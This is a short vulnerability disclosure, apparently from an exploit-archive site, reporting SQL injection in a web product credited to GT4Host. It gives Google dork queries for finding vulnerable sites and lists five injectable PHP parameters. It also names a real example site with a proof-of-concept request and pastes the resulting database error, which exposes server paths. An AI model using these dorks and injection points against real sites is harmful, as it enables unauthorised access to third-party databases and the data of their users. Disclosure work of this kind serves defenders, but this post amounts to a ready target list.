Middle East Design and Programming GT4Host.Com Hosting SQL Injection Vulnerability

2018.06.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Middle East Design and Programming GT4Host.Com Hosting SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 01/06/2018 # Vendor Homepage : GT4Host.Com # Tested On : Windows # Exploit Risk : Medium # CWE: CWE-89 ################################################################################################# # Google Dork 1 : intext:''جميع الحقوق محفوظة لدَتك الدولية لجودة التدريب - الشرق الأوسط'' # Google Dork 2 : intext:''الشرق الأوسطتصميم وبرمجة GT4Host'' # Exploit : /organizationworker.php?organizationid=[SQL Injection] # Exploit : /coworker.php?teammemberid=[SQL Injection] # Exploit : /month.php?monthid=[SQL Injection] # Exploit : /subprogram.php?coursecatid=[SQL Injection] # Exploit : /aboutus.php?id=[SQL Injection] ################################################################################################# # Example Site => datc-bd.com/controllers/aboutus.php?id=1%27 => [ Proof of Concept of SQL Inj ] => archive.is/k2IQg # SQL-DB Error => Fatal error: Uncaught exception 'Exception' with message '1' is not a number' in /home/dtcgt4ho/public_html/models/sql/SqlQuery.class.php:55 Stack trace: #0 /home/dtcgt4ho/public_html/models/mysql/PagesMySqlDAO.class.php(19): SqlQuery->setNumber('1'') #1 /home/dtcgt4ho/public_html/controllers/aboutus.php(171): PagesMySqlDAO->load('1'') #2 /home/dtcgt4ho/public_html/controllers/aboutus.php(124): aboutusdata() #3 {main} thrown in /home/dtcgt4ho/public_html/models/sql/SqlQuery.class.php on line 55 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team [ Turkish Moslem Hackers ] #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top